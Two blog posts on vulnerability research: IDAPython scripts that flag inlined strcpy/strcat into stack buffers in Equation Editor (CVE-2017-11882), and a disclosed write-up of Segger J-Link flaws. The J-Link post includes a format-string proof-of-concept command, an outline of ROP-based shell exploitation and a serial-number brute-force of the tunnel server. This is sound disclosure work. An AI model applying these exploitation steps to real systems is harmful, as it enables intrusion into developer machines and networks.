In the above screenshot we can observe that the decompiler output on the right side shows that a call to strcpy in made, but when we look to the left side disassembly there is not a corresponding call to strcpy. When looking for inlined string functions, a common feature of the inlined assembly to watch for is the use of the “repeat” assembly instructions (rep, repnz, repz) in performing the string operations. With this in mind, let’s dig into the disassembly to see what the compiler has used to replace strcpy in the disassembly above.

 

First, we observe the instruction at 0x411646: `repne scasb`. This instruction is commonly used to get the length of a string (and is often used when strlen() is inlined by the compiler). Looking at the arguments used to set up the `repne scasb` call we can see that it is getting the length of the string “arg_0”. Since performing a strcpy requires knowing the length of the source string (and consequently the number of bytes/characters to copy), this is typically the first step in performing a strcpy.

 

Next we continue down and see two similar looking instructions in `rep movsd` and `rep movsb`. These instructions copy a string located in the esi register into the edi register. The difference between these two instructions being the `rep movsd` instruction moves DWORDs from esi to edi, while `rep movsb` copies bytes. Both instructions repeat the copy instruction a number of times based upon the value in the ecx register.

 

Viewing the above code we can observe that the code uses the string length found by `repne scasb` instruction in order to determine the size of the string that is being copied. We can observe this by viewing seeing that following instruction 0x41164C the length of the string is stored in both eax and ecx. Prior to executing the `rep movsd` instruction we can see that ecx is shifted right by two. This results in only full DWORDs from the source string being copied to the destination. Next we observe that at instruction 0x41165A that the stored string length is moved back into ecx and then bitwise-AND’d with 3. This results in any remaining bytes that were not copied in the `rep movsd` instruction to be copied to the destination.  

 

Automating Vuln Hunting with the Inlined strcpy()

Now that we understand how the compiler optimized strcpy function calls we are able to enhance our vulnerability hunting scripts to allow us to find instances where they an inlined strcpy occurs. In order to help us do this, we will use the IDAPython API and the search functionality that it provides us with. Looking at the above section the primary instructions that are more or less unique to strcpy are the `rep movsd` with the `rep movsb` instruction following shortly thereafter to copy any remaining uncopied bytes.

 

So, using the IDAPython API to search for all instances of `rep movsd` followed by `rep movsb` 7 bytes after it gives us the following code snippet:

 

ea = 0
while ea != BADADDR:
   addr = FindText(ea+2,SEARCH_DOWN|SEARCH_NEXT, 0, 0, "rep movsd");
   ea = addr
   if "movsb" in GetDisasm(addr+7):
       print "strcpy found at 0x%X"%addr

 

If we run this against the EQNEDT32.exe, then we get the following output in IDA Pro:

Output of Script Against EQNEDT32.exe

Output of Script Against EQNEDT32.exe

 

If we begin to look at all of the instances where the script reports detected instances of inlined strcpy we find several instances where this script picks up other functions that are not strcpy but are similar. The most common function (other than strcpy) that this script detects is strcat(). Once we think about the similarities in functionality between those functions, it makes a lot of sense. Both strcat and strcpy are dangerous string copying functions that copy the entire length of a source string into a destination string regardless of the size of the destination buffer. Additionally, strcat introduces the same dangers as strcpy to an application, finding both with the same script is a way to kill two birds with one stone.

 

Now that we have code to find inlined strcpy and strcat in the code, we can add that together with our previous code in order to search specifically for inline strcpy and strcat that copy the data into stack buffers. This gives us the code snippet shown below:

 

# Check inline functions
info = idaapi.get_inf_structure()
ea = 0

while ea != BADADDR:
   addr = FindText(ea+2,SEARCH_DOWN|SEARCH_NEXT, 0, 0, "rep movsd");
   ea = addr
   _addr = ea

   if "movsb" in GetDisasm(addr+7):
       opnd = "edi" # Make variable based on architecture
       if info.is_64bit():
           opnd = "rdi"

      
       val = None
       function_head = GetFunctionAttr(_addr, idc.FUNCATTR_START)
       while True:
           _addr = idc.PrevHead(_addr)
           _op = GetMnem(_addr).lower()

           if _op in ("ret", "retn", "jmp", "b") or _addr < function_head:
               break

           elif _op == "lea" and GetOpnd(_addr, 0) == opnd:
               # We found the origin of the destination, check to see if it is in the stack
               if is_stack_buffer(_addr, 1):
                   print "0x%X"%_addr
                   break
               else: break

           elif _op == "mov" and GetOpnd(_addr, 0) == opnd:
               op_type = GetOpType(_addr, 1)

               if op_type == o_reg:
                   opnd = GetOpnd(_addr, 1)
                   addr = _addr
               else:
                   break

Running the above script and analyzing the results gives us a list of 32 locations in the code where a strcpy() or strcat() call was inlined by the compiler and used to copy a string into a stack buffer.

 

Improving Upon Previous Stack Buffer Check

Additionally, now that we have some additional experience with IDA Python, let us improve our previous scripts in order to write scripts that are compatible with all recent versions of IDA Pro. Having scripts that function on varying versions of the IDA API can be extremely useful as currently many IDA Pro users are still using IDA 6 API while many others have upgraded to the newer IDA 7.

 

When IDA 7 was released, it came with a large number of changes to the API that were not backwards compatible. As a result, we need to perform a bit of a hack in order to make our is_stack_buffer() function compatible with both IDA 6 and IDA 7 versions of the IDA Python API. To make matters worse, not only has IDA modified the get_stkvar() function signature between IDA 6 and IDA 7, it also appears that they introduced a bug (or removed functionality) so that the get_stkvar() function no longer automatically handles stack variables with negative offsets.

 

As a refresher, I have included the is_stack_buffer() function from the previous blog post below:

def is_stack_buffer(addr, idx):
   inst = DecodeInstruction(addr)
   return get_stkvar(inst[idx], inst[idx].addr) != None

First, we begin to introduce this functionality by adding a try-catch to surround our call to get_stkvar() as well as introduce a variable to hold the returned value from get_stkvar(). Since our previous blog post worked for the IDA 6 family API our “try” block will handle IDA 6 and will throw an exception causing us to handle the IDA 7 API within our “catch” block.

 

Now in order to properly handle the IDA 7 API, in the catch block for the we must pass an additional “instruction” argument to the get_stkvar() call as well as perform a check on the value of inst[idx].addr. We can think of “inst[idx].addr” as a signed integer that has been cast into an unsigned integer. Unfortunately, due to a bug in the IDA 7 API, get_stkvar() no longer performs the needed conversion of this value and, as a result, does not function properly on negative values of “inst[idx].addr” out of the box. This bug has been reported to the Hex-Rays team but, as of when this was written, has not been patched and requires us to convert negative numbers into the correct Python representation prior to passing them to the function. To do this we check to see if the signed bit of the value is set and, if it is, then we convert it to the proper negative representation using two’s complement.

 

def twos_compl(val, bits=32):
   """compute the 2's complement of int value val"""
   
   # if sign bit is set e.g., 8bit: 128-255 
   if (val & (1 << (bits - 1))) != 0: 
       val = val - (1 << bits)        # compute negative value

   return val                             # return positive value as is

   
def is_stack_buffer(addr, idx):
   inst = DecodeInstruction(addr)

   # IDA < 7.0
   try:
       ret = get_stkvar(inst[idx], inst[idx].addr) != None

   # IDA >= 7.0
   except:
       from ida_frame import *
       v = twos_compl(inst[idx].addr)
       ret = get_stkvar(inst, inst[idx], v)

   return ret

 

Microsoft Office Vulnerability

The Equation Editor application makes a great example program since it was until very recently, a widely distributed real-world application that we are able to use to test our IDAPython scripts. This application was an extremely attractive target for attackers since, in addition to it being widely distributed, it also lacks common exploit mitigations including DEP, ASLR, and stack cookies.

 

Running the IDAPython script that we have just written finds and flags a number of addresses including the address, 0x411658. Performing some further analysis reveals that this is the exact piece in the code that caused CVE-2017-11882, the initial remote code execution vulnerability found in Equation Editor.

 

Additionally, in the time that followed the public release of CVE-2017-11882, security researchers began to turn their focus to EQNEDT32.exe due to the creative work done by Microsoft to manually patch the assembly (which prompted rumors that Microsoft had somehow lost the source code to EQNEDT32.exe). This increased interest within the security community led to a number of additional vulnerabilities being subsequently found in EQNEDT32.exe (with most of them being stack-buffer overflows). These vulnerabilities include: CVE-2018-0802, CVE-2018-0804, CVE-2018-0805, CVE-2018-0806, CVE-2018-0807, CVE-2018-0845, and CVE-2018-0862. While there are relatively scarce details surrounding most of those vulnerabilities, given the results of the IDAPython scripting that we have performed, we should not be surprised that a number of additional vulnerabilities were found in this application.

 

Posted on November 20, 2018 .

Infecting the Embedded Supply Chain

NOTE: This blog post is based on our DEF CON talk with the same title. If you would like to view the slides from DEF CON, they can be viewed here. Demonstration videos will be posted soon.

Overview

As IoT devices continue to become more and more commonplace, new threats and attack vectors are introduced that must be considered. Embedded devices contain a variety of distinct surfaces that a determined attacker could target. One such attack vector that must be considered is the development supply chain. In developing an IoT device, a development team requires a variety of special components, tools, and debuggers. Any of these products could be targeted by an attacker to compromise the integrity of the device that is being developed. With that in mind, we analyze the security of the Segger J-Link Debug Probes. Hardware debuggers, such as the J-Link, are critical tools in assisting developers with building embedded devices. Segger claims that their J-Link devices are “the most widely used debug probes in the world."

 

J-Link Attack Surface

The Segger J-Link debug probes come with a variety of supporting software packages that are used in order to interact with the debug probes. Included in this software is:

  • Many user-mode applications

  • USB driver

  • Full Integrated Development Environment (IDE)

Analyzing the user-mode applications that were distributed with the J-Link revealed that many of the applications were missing binary protections which can assist in preventing the successful exploitation of vulnerabilities. The analysis of the binary protections revealed:

  • DEP/NX was enabled

  • ASLR was enabled

  • PIE was not enabled

  • Stack canaries were NOT present in *nix binaries, stack canaries were present in Windows

  • SafeSEH was used in Windows binaries
     

As we began to analyze the applications included with J-Link, we quickly identified a number of input vectors that these applications accepted. These input vectors included command line arguments, files, and network interfaces. With this information in mind, we began to examine the applications’ security.

Vulnerability Research

After identifying input vectors and getting a feel for the applications, we determined to move forward with security analysis through a combination of fuzzing and reverse engineering. As we began to further analyze these applications and began to compare the Linux and Windows versions of these packages we found that the majority of the code was cross-compiled. This made our lives easier as we knew that the functionality was nearly identical between the Windows and Linux versions of the application.

 

Additionally, we realized that much of the interesting application logic appeared to require traversing deep, complicated code paths to reach. As a result of this, we decided to use a generational fuzzing approach in order to attempt to achieve better fuzzing coverage of these hard to reach code paths. This method involved using knowledge of the binary gathered from reverse engineering in order to determine the structure of data that each respective application expects to receive and leads to the “interesting” code sections and then recreating that data structure within the context of our fuzzer’s data specification format.

 

Since we were planning to generationally fuzz both network and file formats we decided to use the Peach fuzzer. Peach allows us to define our data formats in a simple XML file format and includes support for all of the desired input vectors (networking, files, command line) out of the box.

 

We then developed several data format specifications (known in Peach as pit files) and began fuzzing various J-Link applications. We started seeing crashes right away, but we also began to have issues as the J-Link debug probes entered a bad state and were disconnected from the VM that we were using for fuzzing. This caused our fuzzing to halt as the applications that we were fuzzing require that a J-Link device be present as the applications require the device in order to properly execute.

 

In order to keep our J-Link attached to our VM we developed a custom crash monitor in order to ensure that the device was attached prior to executing any fuzzing iteration. The crash monitor is triggered on any crash that occurs while fuzzing and executes a user-specified set of actions. We wrote a custom script for the crash monitor to execute that utilized libvirt to check if the J-Link device was still attached to the VM and, if it was not attached, then reattach it. This allowed us to continue fuzzing the applications without issue.

 

Soon we were forced to halt our fuzzing efforts since we had observed so many crashes that we were running out of disk space due to the crash data stored by Peach. While triaging the crashes we noticed some interesting things about the crashes. First, we observed that a huge number of crashes were identical and were being automatically flagged as exploitable (thanks to !exploitable). These crashes made up such a large portion of our crashes that we received less coverage overall from our fuzzers than we had initially hoped for. Further analysis of our crashes revealed that, while we had built the data models to reach deep and interesting code paths, easy to trigger bugs that were located early in the execution path were causing crashes prior to reaching the code paths that we had initially targeted for security analysis.

 

Even though we received less coverage than we had hoped, we were still left with a variety of distinct crashes that appeared to be exploitable after some initial triage. With this information, we then attempted to see if we could fully exploit any of the issues that we had discovered.

 

Vulnerabilities Discovered

CVE-2018-9094 - Format String Vulnerability

One of the first vulnerabilities that we found was a format string vulnerability. This vulnerability can be demonstrated with a command line argument. Simply passing in a format specifier (such as “%p”) as part of the file name on the command line results in the format specifier to be formatted as such. We show this below with “fileName%p” in the command line being converted to “fileName00922C0F” in the output.

Format String Vulnerability Demonstration

Format String Vulnerability Demonstration

In the vulnerable application, JFlashSPI_CL.exe, we have a user controlled string which inserted into a larger log message string via sprintf. This log message string is then passed as the first argument into a “printf-style” function which accepts format specifiers. Hex-Rays decompiler output showing this vulnerable code snippet is shown below and clearly shows the vulnerability.

Hex-Rays Output of the Source of the Vulnerability

Hex-Rays Output of the Source of the Vulnerability

Further reversing reveals that the “custom_printf” function shown above is a logging function that is included in the J-Link applications. This function accepts a subset of the format specifiers that are accepted by printf and does not accept the “%n” family of specifiers that allow one to generate arbitrary writes via a format string vulnerability. With that being said, it is still possible to generate an arbitrary read with this code.

 

We can demonstrate this with the following command:

JFlashSPI_CL.exe -open xAAAA%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%s

Running this command results in an arbitrary read, in this case of the address 0x41414141 (or “AAAA”) and causes the following exception to be thrown:

Exception Thrown when Reading Memory "AAAA"

Exception Thrown when Reading Memory "AAAA"

 

CVE-2018-9095 - Command File Stack Buffer Overflow

Next, we analyzed the individual crash that made up a huge majority of our total crashes and caused us to eat up most of our VM’s disk space. This vulnerability is a traditional stack buffer overflow. In this vulnerability, we can overflow a stack buffer by including a line with 511 characters or more in a command file that is parsed by the JLinkExe application.

 

Since this application is compiled with NX protections in addition to ASLR, we are forced to bypass these in order to exploit this vulnerability and gain arbitrary code execution. In order to bypass the NX protections, we utilized ROP in order to perform all operations needed to gain execution. Using Ropper, we searched through the ROP gadgets that were present in JLinkExe in order to bypass ASLR and then gain execution. Since ASLR was enabled, we need to determine the address of libc and, subsequently, system(). Fortunately, we have enough gadgets present in JLinkExe in order to leak the address of libc.

 

We are able to leak the address of libc using a traditional GOT deference technique in which we dereference the GOT entry of some libc function and then utilize that dereferenced address in order to calculate the address of the desired function - in our case system() -  by performing arithmetic to add or subtract the static offset of our desired function from the dereferenced function.

 

This left us needing to pass an argument to system() in order to gain code execution. Since this vulnerability is triggered by a file that is local to the exploited system, we focused on just getting shell via this system rather than passing arbitrary, user-controlled payloads to it. This made finishing our exploitation somewhat simpler since we now just had to find a string to pass to the call to system in order to get our shell. However, since we were unable to send null bytes, we were limited with regards to which addresses we could pass as an argument to system. For example, our first thought was to use the “/bin/sh” string in the libc library, but the address of that string contains a null byte, forcing us to use a different address. As a result of that, we started focusing on strings in the valid address space and realized that we had a number of options to work with.

 

$ strings JLinkExe | grep "sh$"
fflush
SWOFlush
.gnu.hash

 

By pointing our argument to system() into the middle of a string that ended with “sh” we were able to execute the “sh” command as our argument to system(). This allows us to bypass the limitations on addresses and launches a shell for us, giving us the execution that we desired.

CVE-2018-9097 - Settings File Buffer Overflow

In the course of our fuzzing we found another buffer overrun caused by an input file JLinkExe. This vulnerability was caused by a buffer overrun in the BSS segment of a shared library that was used by the main executable. At this point, we could write an arbitrary number of non-null bytes into the BSS segment of the libjlinkarm.so.6.30.2, but we still needed some way to gain control of execution in the application in order to execute our code. Since we had the ability to overwrite arbitrary data into the BSS segment, we began to look into ways that we could turn that into code execution.

 

Using the IDA Sploiter plugin in IDA Pro, we searched for writable function pointers that we could overwrite. Fortunately, we were able to identify a number of overwritable function pointers following our overflowable buffer. After a little bit more research into those function pointers we were able to identify a function pointer that we could overwrite without causing the application to crash and would also get called soon after overwriting. With that, we were able to consistently redirect execution to a user-controlled location. At this point, we decided not to finish full exploitation on this vulnerability as and to instead focus more on the remote vulnerabilities that we had found. The reason for this was the similarity in the attack vector and impact of exploitation between this vulnerability and CVE-2018-9095.

CVE-2018-9096 - Telnet Stack Buffer Overflow

One interesting observation that we made when initially analyzing the applications that are included with the J-Link was that an application, JLinkRemoteServer, listens on a number of ports. Of particular interest to us was that the application listens on port 23.

 

$ sudo netstat -tulpn | grep JLinkRemote
tcp        0 0 0.0.0.0:24              0.0.0.0:* LISTEN 31417/./JLinkRemote
tcp        0 0 127.0.0.1:19080         0.0.0.0:* LISTEN 31417/./JLinkRemote
tcp        0 0 0.0.0.0:19020           0.0.0.0:* LISTEN 31417/./JLinkRemote
tcp        0 0 127.0.0.1:19021         0.0.0.0:* LISTEN 31417/./JLinkRemote
tcp        0 0 127.0.0.1:19030         0.0.0.0:* LISTEN 31417/./JLinkRemote
tcp        0 0 0.0.0.0:23              0.0.0.0:* LISTEN 31417/./JLinkRemote

 

Since port 23 is commonly used by telnet we decided to focus some of our reverse engineering efforts on this executable to determine what the purpose of this open port is. After beginning to look into this portion of the application in IDA Pro, we were quickly able to identify that this was, in fact, a Telnet server within the application.

Hex-Rays Output Showing the Creation of a Telnet Server Thread&nbsp;

Hex-Rays Output Showing the Creation of a Telnet Server Thread 

With this information, we configured our fuzzer to focus on the open ports with a special focus on the Telnet server as it appeared to have a large attack surface. Fuzzing the Telnet server revealed one interesting crash that appeared to be exploitable but was difficult for our team to reproduce. Additional analysis led us to discover that this was the result of a stack-buffer overflow. However, we were still unable to consistently trigger that crash. After further reversing of this application we were able to identify a race condition caused the application to either crash or continue running.

 

While we were unable to cause this crash to happen consistently, we were able to write an exploit which exploited this vulnerability in the instances where the race condition triggers the crash. In order to do this we followed a similar technique to what we used in the local stack buffer overflow exploit where we utilize a ROP chain in order to leak an address inside of libc through a GOT dereference and then use that leaked address to calculate the address of system().

 

Once we had the address of system() we wanted to develop a method for the exploit to execute an arbitrary, user-controlled command. While looking at the state of program memory during exploitation, we found that user-controlled data was also being stored in static locations in program memory. Due to the multithreaded nature of the JLinkRemoteServer application, the exact location where this data was stored in memory varied between two locations. Due to these locations being somewhat close to each other in memory, we attempted to develop a solution in order to allow our exploit to work consistently, regardless of which memory location the data was stored at.

 

While brainstorming potential solutions to this problem, we devised a solution using a clever trick. This trick is very similar to using a nop-sled. A nop-sled is when a shell-code payload is prepended with many nops or no-op instructions in order to increase the likelihood of executing the shellcode payload by allowing the application’s execution to be redirected anywhere into the nop-sled that was prepended to the payload and always execute the payload since the nop instructions are valid instructions which do not change the state of the application.

 

As we thought more about this technique, we began thinking about whether there was anything similar that we could prepend to our text-based command payload which would have the same effect. We immediately decided to try using spaces to prepend to our payload in order to try what we termed as a “space-sled”. Using this space-sled we prepend spaces to our command so that regardless of which location the user-controlled data was copied to, we would be able to point to the latter location in memory and land in a usable portion of the command string.  

CVE-2018-9093 - Tunnel Server Backdoor

Lastly, we have the J-Link tunnel server which effectively is a backdoor to J-Link devices via a Segger proxy server. The purpose of the tunnel server is to enable remote debugging of embedded devices, but, given that the tunnel server does not implement even the most basic of security measures, in doing so opens any J-Link device using this feature vulnerable to attack.

 

When the remote server runs with a J-Link device attached, the JLinkRemoteServer application registers the J-Link device serial number with the Segger tunnel server. In order to remotely access this remote device, a client must connect to the tunnel server and provide a serial number of the device that the client wishes to connect to.

 

Since serial numbers are 9 decimal digits, this means that there are 10 billion possible serial numbers. Assuming that valid serial numbers are randomly distributed throughout this space and the rate that we can check to see if a serial number is connected is 10 serial numbers/sec (this is about what we’ve seen in our testing) it would take over 31 years to check the entire serial number space. This seemed large enough that it would prove generally unfeasible for an attacker to brute force serial numbers on a large scale.

 

However, we realized that if we could shrink the space of serial numbers then we could potentially reduce the amount of time required to brute-force the space of serial numbers. In order to attempt to reduce the number of serial numbers that we needed to brute force, we began by trying to gather as much information on device models and serial numbers as we could. We did this by searching online for images of J-Link devices where we were able to read the device serial numbers from the images as well as gather the serial numbers from all of the devices that we had access to. Between these two methods we were able to gather around 30 J-Link serial numbers to analyze.

 

After reviewing these serial numbers we were able to detect several patterns in the way that Segger assigned J-Link serial numbers. The serial numbers seemed to be divided into three distinct sections: device model, device version, and an incremented device number.

Segger Serial Number Divided into Sections

Segger Serial Number Divided into Sections

With this information, we were able to reduce the serial number space required in order to get good coverage of J-Link serial numbers from the initial 10 billion to around 100,000. Using the same rate as above, that effectively reduces the time to brute from from over 31 years to less than 3 hours. This reduction in address space suddenly makes an attack on the Segger J-Link server much more appealing to an attacker.

 

Impact of Vulnerabilities

The vulnerabilities discovered are listed above in increasing level of severity. Below we discuss the impact of each of these vulnerabilities and explain the potential impact of an attacker exploiting each vulnerability.

 

The first vulnerability, CVE-2018-9094, is not able to be used to gain code execution due to the custom format string functions that are in use and, even if it were, would be a lower severity simply due to the input vector (the command line) that is used to exploit that vulnerability.

 

Next up, we have CVE-2018-9095 and CVE-2018-9097. These two vulnerabilities involve malicious files and result in gaining code execution when a malicious file is opened by a J-Link application. These are more severe since malicious files are a common attack vector and are able to be spread via email or any other file transfer mechanism. An attacker could use one of these vulnerabilities to attempt to gain access to the a system by getting an unwitting user to open a malicious file in a vulnerable application. As a result, these vulnerabilities are a high severity, but exploitation still relies on a user opening an untrusted file.

 

CVE-2018-9096 is our first remote exploit. This exploit allows a user to gain code execution on a system remotely and without any interaction from the victim. This is a critical vulnerability as it allows an attacker to spread throughout a network to any machine that is running the vulnerable application.

 

Lastly, we have CVE-2018-9093. This vulnerability is perhaps the most severe of these vulnerabilities. This vulnerability allows attackers to gain access into a network, bypassing firewalls and other security systems to gain access inside a network. Once inside the network with this vulnerability an attacker could read or write the firmware of any devices attached to the remote J-Link. To make matters worse, this vulnerability simply requires knowledge of the Segger J-Link serial number scheme and a small bit of reverse engineering to discover the hardcoded “magic numbers” that Segger uses in order to make a connection to via their tunnel server.

Disclosure

Following this research, we disclosed these vulnerabilities to Segger on April 4, 2018. They were acknowledged by Segger shortly later and we have seen many of these issues patched in several of the subsequent releases of the J-Link software.

Conclusion/Takeaways

As we have previously demonstrated with our security research into Hello Barbie and Election Safe Locks, many embedded devices have severe security flaws. With that being said, if you are a developer or device manufacturer who is attempting to build a secure device it is important to consider your supply chain. As we have shown here, important elements of the device development process oftentimes contain vulnerabilities that could compromise the integrity of a device that is being developed as well as the entire network.

 

Posted on August 11, 2018 .